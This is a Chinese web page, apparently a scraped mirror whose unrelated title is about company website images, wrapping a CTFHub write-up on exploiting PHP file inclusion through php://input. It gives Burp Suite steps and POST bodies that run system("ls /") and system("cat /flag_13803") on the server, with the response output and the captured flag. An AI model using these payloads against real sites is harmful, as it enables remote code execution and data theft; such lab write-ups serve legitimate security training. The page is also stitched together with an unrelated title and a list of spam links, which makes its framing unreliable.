当前位置: 首页 > news >正文

公司网站首页图片素材房屋装饰

news 2025/11/3 21:37:08
公司网站首页图片素材,房屋装饰,如何选择锦州网站建设,在线html编辑我们需要使用php://input来构造发送的指令 查看phpinfo&#xff0c;找到一下字段 证明是可以使用php://input 1. 使用Burpsuite抓包并转至Repeater 2. 构造包 方法&#xff1a;POST 目标&#xff1a;/?filephp://input Body&#xff1a;<?php system("ls /"…

我们需要使用php://input来构造发送的指令
查看phpinfo,找到一下字段
在这里插入图片描述
证明是可以使用php://input

1.   使用Burpsuite抓包并转至Repeater

2. 构造包

方法:POST
目标:/?file=php://input
Body:<?php system("ls /"); ?>

响应:

HTTP/1.1 200 OK
Server: openresty/1.21.4.2
Date: Mon, 13 Nov 2023 08:59:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 178
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *

bin
boot
dev
etc
flag_13803
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

<hr>
i don't have shell, how to get flag? <br>
<a href="phpinfo.php">phpinfo</a>

3. 使用cat访问flag_xxx
<?php system("cat /flag_13803")?>

flag: 
ctfhub{3dca56f1cd6b532d39ac2bde}

http://www.yayakq.cn/news/902072/

相关文章:

  • 任丘市网站建设价格青岛公司
  • 网站app开发平台网站建设 十年
  • 想做网站的公司好做纸巾定制的网站
  • 湖南大型网站建设公司网富全网营销 有效果吗
  • 毕节网站建设推广广西庆海建设发展有限公司网站
  • 南充网站建设服务商临沂做网站首选
  • 自助开通网站wordpress建站教程新手
  • 面试个人简历范文及网站建设12580黄页注册的公司
  • 如何架设内部网站wordpress目录主题
  • 建网站石家庄淘宝网络营销案例分析
  • 怎么做网站主建设一个班级网站的具体步骤
  • 营销型网站建设实战网络营销方案分析整理
  • 网站设计教程网站外贸网站是什么意思
  • 福田企业网站优化排名详情页模板哪个网站好
  • 网站建设 的公司哪家好郑口住房和城乡建设局网站
  • 中高端社交网站建设服务商中企动力员工邮箱忘记密码
  • 哪个网站可以做图交易平台中国建设部网站失信名单
  • 耒阳市网站建设珠海七中科技制作
  • 12306网站是哪个公司做的长沙营销型网站开发
  • 赤峰是住房和城乡建设局网站网站内页标题
  • 自己怎么做可以让百度收录的网站微信营销技巧
  • .net 门户网站asp.net做网站步骤
  • 金湖有哪里做网站的做网站 图片更好看
  • 济宁网站建设第一品牌网站建设学什么专业
  • 徐州网站建设公司哪家好广东网站备案电话号码
  • 天津品牌网站建设是什么专业做外贸的网站
  • php教育视频网站开发绵阳高新区建设局网站
  • 蚌埠公司做网站大型网站需要什么样的团队
  • 自己做彩票网站犯法吗附近最近的广告公司
  • 做资金盘 互助盘的网站wordpress建站版本推荐